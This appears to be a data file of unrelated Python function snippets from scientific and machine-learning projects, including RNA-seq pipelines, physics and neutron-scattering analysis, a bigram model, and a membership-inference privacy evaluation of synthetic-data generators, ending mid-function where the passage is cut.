parser.add_argument('-mlp_depth', default=1, type=int,\n help='Number of hidden layers in other MLPs')\n parser.add_argument('-mlp_size', default=3000, type=int,\n help='MLP size used in the model')\n\n parser.add_argument('-cross_val_split', default=0, 
type=int,\n help='Cross validation split to be used.')\n parser.add_argument('--batch_size', '-bsize',\n help='Batch size', default=1, type=int)\n parser.add_argument('-num_train_docs', default=None, type=int,\n help='Number of training docs.')\n parser.add_argument('-dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-max_epochs',\n help='Maximum number of epochs', default=25, type=int)\n parser.add_argument('-seed', default=0,\n help='Random seed to get different runs', type=int)\n parser.add_argument('-init_lr', help=\"Initial learning rate\",\n default=5e-4, type=float)\n parser.add_argument('-checkpoint', help=\"Use checkpoint\",\n default=False, action=\"store_true\")\n parser.add_argument('-eval', help=\"Evaluate model\",\n default=False, action=\"store_true\")\n parser.add_argument('-slurm_id', help=\"Slurm ID\",\n default=None, type=str)\n\n args = parser.parse_args()\n\n model_name = get_mention_model_name(args)\n print(model_name)\n\n model_dir = path.join(args.base_model_dir, model_name)\n args.model_dir = model_dir\n best_model_dir = path.join(model_dir, 'best_models')\n args.best_model_dir = best_model_dir\n if not path.exists(model_dir):\n os.makedirs(model_dir)\n if not path.exists(best_model_dir):\n os.makedirs(best_model_dir)\n\n if args.dataset == 'litbank':\n args.data_dir = path.join(args.base_data_dir, f'{args.dataset}/{args.doc_enc}/{args.cross_val_split}')\n else:\n args.data_dir = path.join(args.base_data_dir, f'{args.dataset}/{args.doc_enc}')\n\n # if args.dataset == 'ontonotes':\n # args.pretrained_model = path.join(\n # args.pretrained_mention_model_dir, f'mention_ontonotes_{args.model_size}_{args.ment_emb}.pt')\n # Log directory for Tensorflow Summary\n\n Experiment(**vars(args))", "def analyse ( self ) :\n odin = self.get( self.RootInTES + 'DAQ/ODIN' )\n \n ## Check for PVs\n PVs = self.get( self.RootInTES + self.InputPrimaryVertices )\n if not PVs or PVs.size() == 0:\n self.setFilterPassed( False )\n return SUCCESS\n\n ## get recontructed B+ mesons\n Bs = self.select ( 'B' , eval( self._cut % self._selection ) )\n \n if not Bs or Bs.size() == 0:\n self.setFilterPassed( False )\n return SUCCESS \n\n ## Select random candidate\n r = self.random( odin )\n n = Bs.size()\n for i in xrange( n ):\n if r <= ( float( i ) / float( n ) ): break\n B = Bs[ i ]\n \n tisTos = self.tisTosSignal( B, \"Hlt1Track(AllL0|Muon)Decision\" )\n if tisTos.tos():\n ## This has to be a clone, otherwise it doesn't work...\n self.markParticle( B.clone() )\n self.setFilterPassed( True )\n else:\n self.setFilterPassed( False )\n\n return SUCCESS", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--file', '-f', type=str, help='path to corpus file', default='./train')\n args = parser.parse_args()\n\n corpus_reader = CorpusReader(args.file)\n model = BigramModel(corpus_reader.sents())\n\n test_sentences = ['Suggestive, Watson, is it not?',\n 'It is amazing that a family can be torn apart by something as simple as a pack of wild dogs!',\n 'So spoke Sherlock Holmes and turned back to the great scrapbook in which he was arranging and indexing some of his recent material.',\n 'What I like best about my friends is that they are few.',\n 'Friends what is like are they about I best few my that.']\n\n # prints two paragraphs with each five sentences\n for _ in range(2):\n print(generate(model, 5) + '\\n')\n\n # for each sentence in the test_sentences print the perplexity\n for sentence in test_sentences:\n 
print(model.perplexity(nltk.word_tokenize(sentence)))", "def main():\n\n # Initial message\n taq_data_tools_responses_physical_short_long.taq_initial_message()\n\n # Tickers and days to analyze\n year = '2008'\n tickers = ['AAPL', 'GOOG']\n taus_p = [x for x in range(10, 101, 10)]\n tau = 1000\n\n # Basic folders\n taq_data_tools_responses_physical_short_long.taq_start_folders(year)\n\n # Run analysis\n taq_data_plot_generator(tickers, year, tau, taus_p)\n\n print('Ay vamos!!!')\n\n return None", "def gene_rnaseq(args):\n log.info('running for genes')\n\n group = 'gene' # !!!!\n\n ###########################\n ## sense strand analysis ##\n ###########################\n ## control, args['c1']\n ctl_args = args.copy()\n ctl_args['align_to_te'] = False # required !!!!\n ctl_args['extra_index'] = None # required !!!!\n ctl_args['path_out'] = os.path.join(args['path_out'], args['C'])\n ctl_bam = gene_aligner(args['c1'], args['C'], ctl_args, args['c2'])\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.sens.txt')\n run_featureCounts(\n gtf=args['gtf'],\n bam_files=ctl_bam,\n out=ctl_count,\n strandness=args['s'],\n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## treatment, args['t1']\n tre_args = args.copy()\n tre_args['align_to_te'] = False # required !!!!\n tre_args['extra_index'] = None # required !!!!\n tre_args['path_out'] = os.path.join(args['path_out'], args['T'])\n tre_bam = gene_aligner(args['t1'], args['T'], tre_args, args['t2'])\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], 'gene', 'count', 'count.sens.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='sense')\n\n ###############################\n ## antisense strand analysis ##\n ###############################\n # determine the strandness\n if args['s'] == 2:\n args['anti_strand'] = 1\n elif args['s'] == 1:\n args['anti_strand'] = 2\n else:\n args['anti_strand'] = 0\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=ctl_bam, \n out=ctl_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' 
+ args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='antisense')", "def execute_expression_analysis(self):\n print (\"Expression analisys start...\")\n n = \"consexpression\"\n out_merge_table = ''\n self.execute_merge_table(self._count_table, out_merge_table)\n # 1 ------------------ edgeR -----------------\n out_edger = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_edger.csv\"\n self._edger = EdgeR(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_edger)\n self._edger.run_edger()\n # 2 ------------- BaySeq --------------------\n out_bayseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_baySeq.csv\"\n self._bayseq = BaySeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_bayseq)\n self._bayseq.run_bayseq()\n # 3 ------------- DESeq --------------------\n out_deseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_DESeq.csv\"\n self._deseq = DESeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_deseq)\n self._deseq.run_deseq()\n # 4 ------------- NOISeq --------------------\n out_noiseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_NOISeq.csv\"\n self._noiseq = Noiseq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_noiseq)\n self._noiseq.run_noiseq()\n # 5 ------------- EBSeq --------------------\n out_ebseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_EBSeq.csv\"\n self._ebseq = Ebseq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_ebseq)\n self._ebseq.run_ebseq()\n # 6 ------------- SAMSeq --------------------\n out_samseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_SAMSeq.csv\"\n self._samseq = SamSeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_samseq)\n self._samseq.run_samseq()\n # 7 ------------- limma-voom --------------------\n out_limmavoom = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_limmavoom.csv\"\n self._limmavoom = LimmaVoom(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_limmavoom)\n self._limmavoom.run_limmavoom()", "def covering(argv):\n\n FLAGS = flags.FLAGS\n\n evaluate_sequences.execute(argv)", "def _run(self, **params):\n# if softEvidence is None:\n# self.softEvidence = self.mln.softEvidence\n# else:\n# self.softEvidence = softEvidence\n # initialize chains\n chains = MCMCInference.ChainGroup(self)\n for i in range(self.chains):\n chain = GibbsSampler.Chain(self, self.queries)\n chains.chain(chain)\n# if self.softEvidence is not None:\n# chain.setSoftEvidence(self.softEvidence)\n # do Gibbs sampling\n# if verbose and details: print \"sampling...\"\n converged = 0\n steps = 0\n if self.verbose:\n bar = ProgressBar(color='green', steps=self.maxsteps)\n while converged != self.chains and steps < self.maxsteps:\n converged = 0\n steps += 1\n print('STEP {} / {}'.format(steps, self.maxsteps))\n for chain in chains.chains:\n chain.step()\n if self.verbose:\n bar.inc()\n bar.label('%d / %d' % (steps, self.maxsteps))\n# if self.useConvergenceTest:\n# if chain.converged and numSteps >= minSteps:\n# converged += 1\n# if verbose and details:\n# if numSteps % infoInterval == 0:\n# print \"step %d (fraction converged: %.2f)\" % (numSteps, float(converged) / numChains)\n# if numSteps % resultsInterval == 0:\n# chainGroup.getResults()\n# 
chainGroup.printResults(shortOutput=True)\n # get the results\n return chains.results()[0]", "def run(config, tim=None):\n import dr_lib\n import DST\n \n if tim is not None:\n tim.getTime(False)\n old_time = tim.getOldTime()\n\n if config.data is None:\n raise RuntimeError(\"Need to pass a data filename to the driver \"\\\n +\"script.\")\n\n # Read in geometry if one is provided\n if config.inst_geom is not None:\n if config.verbose:\n print \"Reading in instrument geometry file\"\n \n inst_geom_dst = DST.getInstance(\"application/x-NxsGeom\",\n config.inst_geom)\n else:\n inst_geom_dst = None\n\n # Perform Steps 1-11 on sample data\n d_som1 = dr_lib.process_sas_data(config.data, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.data_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.data_trans)\n\n # Perform Steps 1-11 on buffer/solvent only data\n if config.solv is not None:\n s_som1 = dr_lib.process_sas_data(config.solv, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"solvent\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.solv_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.solv_trans)\n else:\n s_som1 = None\n\n # Step 12: Subtract buffer/solvent only spectrum from sample spectrum\n d_som2 = dr_lib.subtract_bkg_from_data(d_som1, s_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"solvent\")\n \n del s_som1, d_som1\n\n # Perform Steps 1-11 on empty-can data\n if config.ecan is not None:\n e_som1 = dr_lib.process_sas_data(config.ecan, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"empty_can\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.ecan_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale,\n trans_data=config.ecan_trans)\n else:\n e_som1 = None\n\n # Step 13: Subtract empty-can spectrum from sample spectrum\n d_som3 = dr_lib.subtract_bkg_from_data(d_som2, e_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"empty_can\")\n \n del e_som1, d_som2\n\n # Perform Steps 1-11 on open beam data\n if config.open is not None:\n o_som1 = dr_lib.process_sas_data(config.open, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"open_beam\",\n bkg_subtract=config.bkg_coeff,\n acc_down_time=config.open_acc_down_time.toValErrTuple(),\n bkg_scale=config.bkg_scale)\n else:\n o_som1 = None\n \n # Step 14: Subtract open beam spectrum from sample spectrum\n d_som4 = dr_lib.subtract_bkg_from_data(d_som3, o_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"open_beam\")\n \n del o_som1, d_som3\n\n # Perform Steps 1-11 on dark current data\n if config.dkcur is not None:\n dc_som1 = dr_lib.process_sas_data(config.open, config, timer=tim,\n inst_geom_dst=inst_geom_dst,\n dataset_type=\"dark_current\",\n bkg_subtract=config.bkg_coeff)\n else:\n dc_som1 = None\n \n # Step 15: Subtract dark current spectrum from sample spectrum\n d_som5 = dr_lib.subtract_bkg_from_data(d_som4, dc_som1,\n verbose=config.verbose,\n timer=tim,\n dataset1=\"data\",\n dataset2=\"dark_current\")\n \n del dc_som1, d_som4 \n\n # Create 2D distributions is necessary\n if config.dump_Q_r:\n d_som5_1 = dr_lib.create_param_vs_Y(d_som5, \"radius\", \"param_array\",\n config.r_bins.toNessiList(),\n rebin_axis=config.Q_bins.toNessiList(),\n binnorm=True,\n y_label=\"S\",\n y_units=\"Counts / A^-1 m\",\n x_labels=[\"Radius\", \"Q\"],\n x_units=[\"m\", 
\"1/Angstroms\"])\n\n hlr_utils.write_file(config.output, \"text/Dave2d\", d_som5_1,\n output_ext=\"qvr\", verbose=config.verbose,\n data_ext=config.ext_replacement,\n path_replacement=config.path_replacement,\n message=\"S(r, Q) information\")\n\n del d_som5_1\n \n if config.dump_Q_theta:\n d_som5_1 = dr_lib.create_param_vs_Y(d_som5, \"polar\", \"param_array\",\n config.theta_bins.toNessiList(),\n rebin_axis=config.Q_bins.toNessiList(),\n binnorm=True,\n y_label=\"S\",\n y_units=\"Counts / A^-1 rads\",\n x_labels=[\"Polar Angle\", \"Q\"],\n x_units=[\"rads\", \"1/Angstroms\"])\n\n hlr_utils.write_file(config.output, \"text/Dave2d\", d_som5_1,\n output_ext=\"qvt\", verbose=config.verbose,\n data_ext=config.ext_replacement,\n path_replacement=config.path_replacement,\n message=\"S(theta, Q) information\")\n\n del d_som5_1\n \n # Steps 16 and 17: Rebin and sum all spectra\n if config.verbose:\n print \"Rebinning and summing for final spectrum\"\n \n if tim is not None:\n tim.getTime(False)\n\n if config.dump_frac_rebin:\n set_conf = config\n else:\n set_conf = None\n\n d_som6 = dr_lib.sum_by_rebin_frac(d_som5, config.Q_bins.toNessiList(),\n configure=set_conf)\n\n if tim is not None:\n tim.getTime(msg=\"After rebinning and summing for spectrum\") \n\n del d_som5\n\n if config.facility == \"LENS\":\n # Step 18: Scale final spectrum by Q bin centers\n if config.verbose:\n print \"Scaling final spectrum by Q centers\"\n \n if tim is not None:\n tim.getTime(False)\n\n d_som7 = dr_lib.fix_bin_contents(d_som6, scale=True, width=True,\n units=\"1/Angstroms\")\n\n if tim is not None:\n tim.getTime(msg=\"After scaling final spectrum\") \n else:\n d_som7 = d_som6\n\n del d_som6\n\n # If rescaling factor present, rescale the data\n if config.rescale_final is not None:\n import common_lib\n d_som8 = common_lib.mult_ncerr(d_som7, (config.rescale_final, 0.0))\n else:\n d_som8 = d_som7\n\n del d_som7\n \n hlr_utils.write_file(config.output, \"text/Spec\", d_som8,\n verbose=config.verbose,\n replace_path=False,\n replace_ext=False,\n message=\"combined S(Q) information\")\n\n # Create 1D canSAS file\n hlr_utils.write_file(config.output, \"text/canSAS\", d_som8,\n verbose=config.verbose,\n output_ext=\"xml\",\n data_ext=config.ext_replacement, \n path_replacement=config.path_replacement,\n message=\"combined S(Q) information\")\n \n d_som8.attr_list[\"config\"] = config\n\n hlr_utils.write_file(config.output, \"text/rmd\", d_som8,\n output_ext=\"rmd\",\n data_ext=config.ext_replacement, \n path_replacement=config.path_replacement,\n verbose=config.verbose,\n message=\"metadata\")\n\n if tim is not None:\n tim.setOldTime(old_time)\n tim.getTime(msg=\"Total Running Time\")", "def extra_rnaseq(args, gtf):\n log.info('running for other reference')\n group = 'extra'\n ## update gtf\n # args['gtf'] = gtf\n\n ## check if extra_index exists\n if args['extra_index'] is None:\n log.warning('extra analysis skipped, index not exists: {}'.format(args['extra_index']))\n elif not os.path.exists(gtf):\n log.warning('extra analysis skipped, gtf file not exists: {}'.foramt(gtf))\n else:\n ## control, args['c1']\n ctl_args = args.copy()\n ctl_args['path_out'] = os.path.join(args['path_out'], args['C']) \n ctl_bam = extra_aligner(args['c1'], args['C'], ctl_args)\n ## flaten\n ctl_bam = [item for sublist in ctl_bam for item in sublist]\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=ctl_bam, \n out=ctl_count, \n 
strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## treatment, args['t1']\n tre_args = args.copy()\n tre_args['path_out'] = os.path.join(args['path_out'], args['T'])\n tre_bam = extra_aligner(args['t1'], args['T'], tre_args)\n tre_bam = [item for sublist in tre_bam for item in sublist]\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '_vs_' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='sense')\n\n ###############################\n ## antisense strand analysis ##\n ###############################\n # determine the strandness\n if args['s'] == 2:\n args['anti_strand'] = 1\n elif args['s'] == 1:\n args['anti_strand'] = 2\n else:\n args['anti_strand'] = 0\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=ctl_bam, \n out=ctl_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=gtf, \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' 
+ args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='antisense')", "def main():\n args = get_args()\n annot_fp = args.annotations\n out_fp = args.outfile\n blast_fp = args.positional\n\n #print('output_arg = \"{}\"'.format(out_fp))\n #print('annotation_arg = \"{}\"'.format(annot_fp))\n #print('blast_fp = \"{}\"'.format(blast_fp))\n\n if not os.path.isfile(annot_fp):\n print(\"\\\"{}\\\" is not a file\".format(annot_fp))\n exit(1)\n if not os.path.isfile(blast_fp):\n print(\"\\\"{}\\\" is not a file\".format(blast_fp))\n exit(1)\n\n #Load the annotations\n annots_dict = {}\n with open(annot_fp, 'r') as f:\n for l in f:\n larr = l[:-1].split(\",\")\n annots_dict[larr[0]] = larr[6:]\n\n header_str = \"seq_id\\tpident\\tgenus\\tspecies\"\n if out_fp != \"\":\n out = open(out_fp, 'w')\n out.write(\"{}\\n\".format(header_str))\n else:\n print(header_str)\n\n with open(blast_fp, 'r') as f:\n for l in f:\n larr = l.split(\"\\t\")\n seq_id = larr[1]\n tax_info = annots_dict.get(seq_id, [\"BAD\", \"BAD\"])\n if tax_info[0] == \"BAD\":\n warn(msg=\"Cannot find seq {} in lookup\".format(seq_id))\n continue\n genus = tax_info[0]\n species = tax_info[1]\n if genus == \"\":\n genus = \"NA\"\n if species == \"\":\n species = \"NA\"\n if out_fp == \"\":\n print(\"{}\\t{}\\t{}\\t{}\".format(seq_id, larr[2], genus, species))\n else:\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(seq_id, larr[2], genus, species))\n\n if out_fp != \"\":\n out.close()", "def DefaultArgumentParser():\n parser = common.createBasicArgumentParser(\"execute your analysis on a readily initialized sample folder\")\n # add some extra arguments which are helpful for this step of the analysis\n parser.add_argument('--restrict', metavar=\"PATHS\", dest=\"pathselect\", default=\"\", help='restrict the analysis to a path set')\n parser.add_argument('--downmergeTo', metavar=\"DOWNMERGETO\", dest=\"downmergeTo\", default=\"\", help='specify alternative downmerging targets to the paths listed at \\'--restrict\\'')\n parser.add_argument('--downmerge', action=\"store_const\", const=True, default=False,\n help='if the analysis is restricted to a path set, objects will be merged up to the paths specified in \\'--restrict\\'')\n parser.add_argument('--dummy', dest=\"dummy\", action=\"store_const\", const=True, default=False, help='run a dummy analysis (do not read data)')\n parser.add_argument('--debug', dest=\"debug\", action=\"store_const\", const=True, default=False,\n help='run a debug analysis (same as \"-c outputFile=debug.root maxEvents=100\")')\n parser.add_argument('--robust', dest=\"robust\", action=\"store_const\", const=True, default=False,\n help='run robustly over non-well-formed inputs. useful for debugging. 
does not support many vital analysis features.')\n parser.add_argument('--width', dest=\"width\", type=int, default=0, help=\"console width for printouts\")\n parser.add_argument('--jobID', dest=\"jobID\", type=str, default=\"analyze\", help=\"identifier for the job executing this instance\")\n return parser", "def run_analysis(configfile, resultsdir):\n\n\t# Header\n\tInOut.print_head()\n\n\t#reading config from configfile\n\tlistname, filetype, selected_indicators, RVext = InOut.read_config(configfile)\n\n\t#read observations from obslist\n\tfile_names, dataset, BJDs, RVextvalues = InOut.read_obslist(listname, filetype, RVext)\n\n\t#fit Gaussian function to the data\n\tGauss_params = Gaussfitting.dataset_gaussfit(dataset)\n\n\t# Identify selected indicators\n\tIndicatorList = [\"BIS\",\"BIS-\",\"BIS+\",\"biGauss\",\"Vasy\", \"Vspan\", \"FWHM\"]\n\tIndSelected = [ind for ind,selected in zip(IndicatorList, selected_indicators) if selected == 1]\n\n\t#Apply indicators\n\toutput_ASCII_list = [Indicators.run_indicator_analysis(ind, dataset, Gauss_params, file_names, resultsdir, RVextvalues) for ind in IndSelected]\n\n\t#Wrap the results in one single file\n\tInOut.wrapRes(output_ASCII_list, BJDs, resultsdir)\n\n\t# The End\n\tInOut.print_foot()", "def index(args):\n\n logging.info('Starting indexing sequences in %s' % args.sequences)\n logging.error('TODO: Implement indexing!')", "def main():\n indicator = AyatanaIndicator()\n indicator.run()", "def run(sim_attr_generator):\n#TODO: clean\n#TODO: integrate analyses\n def analyze_and_save(simulation,simulation_attributes):\n#? Ugly conf file analyses integration.\n if simulation_attributes.analyses and Args.output_file != None:\n verbose_print(\"Saving analyses for {0}.\".format(simulation_attributes.id_name),2)\n results = analyze_datas(\n simulation.result,\n simulation_attributes.analyses\n )\n plotables = ana_results_to_plotables(\n results,\n simulation_attributes.analyses\n )\n#TODO error handling for save\n analysis_save_dm(\n results,\n plotables,\n simulation_attributes.analyses,\n simulation_attributes.id_name\n )\n\n def save_simulation(simulation,simulation_attributes):\n if not simulation_attributes.analyses and Args.output_file != None:\n verbose_print(\"Saving simulation datas of {0}.\".format(\n simulation_attributes.id_name\n ),2) \n try:\n np.save(\n simulation_attributes.id_name,\n simulation.result\n )\n except:\n raise EnvironmentError(\"Can't save data to {}.\".format(\n simulation_attributes.id_name\n ))\n\n verbose_print(\"Starting simulation run.\",1)\n for i,simulation_attributes in enumerate(sim_attr_generator):\n verbose_print(\"Starting simulation number {0}: {1}\".format(\n i,\n simulation_attributes.id_name\n ),2)\n simulation = Simulation(\n SimulationVariables(simulation_attributes)\n )\n simulation.start()\n save_simulation(simulation,simulation_attributes)\n analyze_and_save(simulation,simulation_attributes)", "def main():\n\n argparser = ArgumentParser()\n argparser.add_argument('--datapath', '-D', type=str, help='Relative path to cwd of a local data file')\n argparser.add_argument('--attack_model', '-AM', type=str, default='ANY', choices=['RandomForest', 'LogReg', 'LinearSVC', 'SVC', 'KNN', 'ANY'])\n argparser.add_argument('--runconfig', '-RC', default='runconfig_mia.json', type=str, help='Path relative to cwd of runconfig file')\n argparser.add_argument('--outdir', '-O', default='outputs/test', type=str, help='Path relative to cwd for storing output files')\n args = argparser.parse_args()\n\n # Load 
runconfig\n with open(path.join(cwd, args.runconfig)) as f:\n runconfig = json.load(f)\n print('Runconfig:')\n print(runconfig)\n\n # Load data\n RawDF, metadata = load_local_data_as_df(path.join(cwd, args.datapath))\n dname = args.datapath.split('/')[-1]\n RawDF['ID'] = [f'ID{i}' for i in arange(len(RawDF))]\n RawDF = RawDF.set_index('ID')\n\n print(f'Loaded data {dname}:')\n print(RawDF.info())\n\n # Randomly select nt target records T = (t_1, ..., t_(nt))\n targetIDs = choice(list(RawDF.index), size=runconfig['nTargets'], replace=False).tolist()\n Targets = RawDF.loc[targetIDs, :]\n\n # Drop targets from sample population\n RawDFdropT = RawDF.drop(targetIDs)\n\n # Add a crafted outlier target to the evaluation set\n targetCraft = craft_outlier(RawDF, runconfig['sizeTargetCraft'])\n targetIDs.extend(list(set(targetCraft.index)))\n Targets = Targets.append(targetCraft)\n\n # Sample adversary's background knowledge RawA\n rawAidx = choice(list(RawDFdropT.index), size=runconfig['sizeRawA'], replace=False).tolist()\n\n # Sample k independent target test sets\n rawTindices = [choice(list(RawDFdropT.index), size=runconfig['sizeRawT'], replace=False).tolist() for nr in range(runconfig['nIter'])]\n\n # List of candidate generative models to evaluate\n gmList = []\n for gm, paramsList in runconfig['generativeModels'].items():\n if gm == 'IndependentHistogram':\n for params in paramsList:\n gmList.append(IndependentHistogram(*params))\n elif gm == 'BayesianNet':\n for params in paramsList:\n gmList.append(BayesianNet(*params))\n elif gm == 'PrivBayes':\n for params in paramsList:\n gmList.append(PrivBayes(*params))\n elif gm == 'CTGAN':\n for params in paramsList:\n gmList.append(CTGAN(metadata, *params))\n elif gm == 'PateGan':\n for params in paramsList:\n gmList.append(PateGan(metadata, *params))\n else:\n raise ValueError(f'Unknown GM {gm}')\n\n for GenModel in gmList:\n print(f'----- {GenModel.__name__} -----')\n\n FeatureList = [NaiveFeatureSet(GenModel.datatype), HistogramFeatureSet(GenModel.datatype, metadata), CorrelationsFeatureSet(GenModel.datatype, metadata), EnsembleFeatureSet(GenModel.datatype, metadata)]\n\n prior = {LABEL_IN: runconfig['prior']['IN'], LABEL_OUT: runconfig['prior']['OUT']}\n\n if args.attack_model == 'RandomForest':\n AttacksList = [MIAttackClassifierRandomForest(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'LogReg':\n AttacksList = [MIAttackClassifierLogReg(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'LinearSVC':\n AttacksList = [MIAttackClassifierLinearSVC(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'SVC':\n AttacksList = [MIAttackClassifierSVC(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'KNN':\n AttacksList = [MIAttackClassifierKNN(metadata, prior, F) for F in FeatureList]\n elif args.attack_model == 'ANY':\n AttacksList = []\n for F in FeatureList:\n AttacksList.extend([MIAttackClassifierRandomForest(metadata, prior, F),\n MIAttackClassifierLogReg(metadata, prior, F),\n MIAttackClassifierKNN(metadata, prior, F)])\n else:\n raise ValueError(f'Unknown AM {args.attack_model}')\n\n # Run privacy evaluation under MIA adversary\n results = evaluate_mia(GenModel, AttacksList, RawDFdropT, Targets, targetIDs, rawAidx, rawTindices,\n runconfig['sizeRawT'], runconfig['sizeSynT'], runconfig['nSynT'],\n runconfig['nSynA'], runconfig['nShadows'], metadata)\n\n outfile = f\"{dname}{GenModel.__name__}MIA\"\n\n with open(path.join(f'{args.outdir}', f'{outfile}.json'), 'w') as 
f:\n json.dump(results, f, indent=2, default=json_numpy_serialzer)", "def main_exb(args):\n\n print(\"Running for you in EXB mode ... \")\n\n # Read in transcript ID list.\n tr_ids_dic = cliplib.read_ids_into_dic(args.in_tr_list)\n tr_ids_c = len(tr_ids_dic)\n assert tr_ids_c, \"no transcript IDs read in from \\\"%s\\\"\" %(args.in_tr_list)\n print(\"# transcript IDs read in: %i\" %(tr_ids_c))\n\n # Generate .tmp files.\n random_id = uuid.uuid1()\n tmp_bed1 = str(random_id) + \".exon_regions.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed2 = str(random_id) + \".overlapping_sites.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed3 = str(random_id) + \".extended_sites.tmp.bed\"\n random_id = uuid.uuid1()\n tmp_bed4 = str(random_id) + \".base_overlaps.tmp.bed\"\n\n # Extract exon regions for given transcripts.\n cliplib.gtf_extract_exon_bed(args.in_gtf, tmp_bed1,\n tr_ids_dic=tr_ids_dic)\n\n # Check .bed for content.\n c_in = cliplib.count_file_rows(args.in_bed)\n assert c_in, \"input .bed file \\\"%s\\\" is empty\" %(args.in_bed)\n\n # First get regions inside exons (overlapping >= 90 % with them).\n params = \"-s -u -wa -f 0.90\"\n cliplib.intersect_bed_files(args.in_bed, tmp_bed1, params, tmp_bed2)\n\n # Filter and extend overlapping sites.\n TMPOUT = open(tmp_bed3,\"w\")\n c_ol = 0\n id2len_dic = {}\n id2stats_dic = {}\n with open(tmp_bed2) as f:\n for line in f:\n cols = line.strip().split(\"\\t\")\n seq_id = cols[0]\n site_s = int(cols[1])\n site_e = int(cols[2])\n site_id = cols[3]\n site_sc = float(cols[4])\n site_pol = cols[5]\n site_l = site_e - site_s\n # Filter by site score.\n if args.score_thr is not None:\n if args.rev_filter:\n if site_sc > args.score_thr:\n continue\n else:\n if site_sc < args.score_thr:\n continue\n # Filter by site length.\n if args.max_len:\n if site_l > args.max_len:\n continue\n if args.min_len:\n if site_l < args.min_len:\n continue\n # Check whether score is whole number.\n if not site_sc % 1:\n site_sc = int(site_sc)\n # Convert to string.\n new_sc = str(site_sc)\n # Extend 